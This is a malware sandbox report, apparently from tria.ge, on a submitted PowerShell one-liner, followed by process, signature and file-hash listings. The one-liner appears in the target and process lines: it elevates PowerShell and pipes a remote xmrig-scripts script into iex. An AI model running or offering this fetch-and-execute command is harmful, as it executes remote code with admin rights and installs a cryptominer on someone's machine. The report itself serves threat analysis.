Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    133s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    27/06/2024, 01:39

General

  • Target

    http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Malware Config

Signatures

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"
    1⤵
    • Access Token Manipulation: Create Process with Token
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1848 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1196
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:2188
    • C:\Windows\System32\control.exe
      "C:\Windows\System32\control.exe" SYSTEM
      1⤵
        PID:2404
      • C:\Windows\SysWOW64\DllHost.exe
        C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
        1⤵
          PID:1364

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

          Filesize

          914B

          MD5

          e4a68ac854ac5242460afd72481b2a44

          SHA1

          df3c24f9bfd666761b268073fe06d1cc8d4f82a4

          SHA256

          cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

          SHA512

          5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

          Filesize

          252B

          MD5

          336f38a3c469393c7b5e1bbef78154ea

          SHA1

          31a4c8e93c8610131429abf745a296a621b7476a

          SHA256

          9c50d1051613f2888c4b8b2b938b8c89b615a8c0a24276fde434546b7f71790b

          SHA512

          cd089e1e306270ce391a2fd89f68e8dd7b578bcb210461f7b324e79bf9a976c17056d8938360319f7eceea3db96c332d568bdae99ad94a069c65e8128a048162

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          7d314bb6f7a8b46693c793d7f24829c9

          SHA1

          39d14b7ab503136ece599633df8e14a99d2a26cb

          SHA256

          ce06e3272b2a27716c7b0ac07839dfb47276245abe43c5b11ff953e5dcdc40e4

          SHA512

          134c5a0fdea24c3300fed791d5ec6c558dfd6172f52cd2f5404cc644e33f9d07458a6eaea9e223a9f29ecda0627c41149cecf3ef36fef932bd4fd8b46be7c979

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          6c7c9e68d2777d54b613edd3455ebf77

          SHA1

          3ae939d1b01cbda284bf0fef63c7f6e272e9b797

          SHA256

          e3bcb799f24f43f8ca5d597611e4c1288f6422aece6d082f5b920d5cf1ce73e4

          SHA512

          5692a43215f93045055fa81bb57473f88122e8677d3d3263e5aa3938bf1b89557519a602fa13c1bd6f2b288795fef33ce866bd7b234bde1154a5529a21acd8ff

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          5298023add06cc028173dad42131eb51

          SHA1

          5532f13c180d5dc77d6dce588545b65e2aac44bf

          SHA256

          31dbddad3c1240d2b73327d41e72d8c400a36e27700e77ec2edac4eaf3a12b18

          SHA512

          4c2cf8845985c0cd79bd92cbad12e2b789fbbab8600af6ecd16c2a84a3df122a5ec3e7b60521d14a344dc21ce811db7287cf2063c84a54c35439781876f27027

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          c373839578f5357fb088088fb6ec7766

          SHA1

          a29029ee738fcdba3c3727bdf7c5da25d3a7c4b3

          SHA256

          d9b1c45f9ab818c88dbe363ba255dec59ebb3f9319e6d0913d83f0cd459a99ef

          SHA512

          a4c1694c53ca64db11dbca51cbe4f7681dbb107064a71cee7f53a68c3911526714a38eedaeabf42ebf16296927ff10ec7fb525c28180b4603afb022ec83deeb3

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          53caf46b4a33efbd7c8bf428ad25a680

          SHA1

          87e54600e61590a5f0936f00b80f75f60f45faac

          SHA256

          a26643a286630cb32064b7c76a5b3ed145425dc916bc0fb7222ff582773653e7

          SHA512

          08632031604719635eda624d82622603b07c2b15ddb328342c3260955950c4c506cb96ea018be3811c310a333d6f703c96efae4b6384981d193884cd7e61b870

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          97bc235856496c08fb8b1974645a3957

          SHA1

          062c1fbce6bb2e6a0d55fa04aee5356822bb5740

          SHA256

          067ca7d7c971bfd5dd97fe804b57a3e5c6698fa8c00e96bf878dc0d3c8481469

          SHA512

          bcb9c5303ee6cb4bef8c2915ff8bf80208f125ff30c6756be94b5e2e21f1d304b30e6bf93f0aafc1faefcbb8e3ef37e18b11badce2417dd45def2b46cb883729

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          49843f3aae8300d7ce4e258805ccd553

          SHA1

          4d8cc49c214e57034a469e2573a4c9e578405bc5

          SHA256

          a5c9cced7adc8ed41282f12cec845e2c664f6bd4291d54a0838d0f195cb62a58

          SHA512

          6711a39656e84750ada86f0c3d6a6e1e54e564d154efe0bc85acf90a7d4a16bd431cd166fdcc13489f042253483c2bf8b320886893a5207f9ecb7138d0403cbb

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          8e104dec98613b4fc556839a3f58d51a

          SHA1

          08c7d41658590a3594d8756665db98b8e0f9a6b0

          SHA256

          d5457314d70db39ae4d7711aa59265a0807e0da7e9f8fcd4338a0cdcb885dc28

          SHA512

          3caf5aea3bd27f175f104d0cb6bed0374822b5f2fd762beb596e3ce28a55dca1125adf7fc22aa9a5a0b6b18a7da02066d4e7f4d412aca979729b43e91b5261a5

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          a72ce72d1102ae14279ed046648708f1

          SHA1

          ba26c27919520f632b5de246da1908b773cd719b

          SHA256

          3677a4499437b4fdcebbdc2f4eba8b1a45fb1e5ef56b5096434080617b46660c

          SHA512

          1607d672d93506e7a90e5a761e2d537f92bf661bd5c78df17f8ed196323b34e1bd66b847536d15d26eb514bf20eb06037d4c252142cbed5572adaa090a58ee09

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          9f469956d0d4dff12a62574799594892

          SHA1

          98037de63366d1d5459f8f23e80bd958de6f427c

          SHA256

          9ad4122c6b46d379d4d1cbf6b56ced88bbb795b585230e3a629cf97693253f62

          SHA512

          cc73ffa52c14069c4ddd62aaa5dd657dfaad51d3c9a11b3235364e593296ca2766d20c68a675f47ec67c48f7d8211e2c422dce9b9496d4e6d91674a62cbe6728

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

          MD5

          90668cb0013f40c6cc99adccea7039c8

          SHA1

          91e513ff0adba79c8486ab39338186a74c652824

          SHA256

          62f9892939e8cf650f5a94192a6be667bae98d37d0ec561638d264e2325ac831

          SHA512

          b1a04860e723fc149571764ef69e2ddea682371d463c2f046e5cb090d8b10aa33d71a6e7262ecff0a7e815cf6e59cfc039bafb00362074ad1687a5836d2623e6

        • C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

          Filesize

          4KB

          MD5

          da597791be3b6e732f0bc8b20e38ee62

          SHA1

          1125c45d285c360542027d7554a5c442288974de

          SHA256

          5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07

          SHA512

          d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

        • C:\Users\Admin\AppData\Local\Temp\Tar3D83.tmp

          Filesize

          181KB

          MD5

          4ea6026cf93ec6338144661bf1202cd1

          SHA1

          a1dec9044f750ad887935a01430bf49322fbdcb7

          SHA256

          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

          SHA512

          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b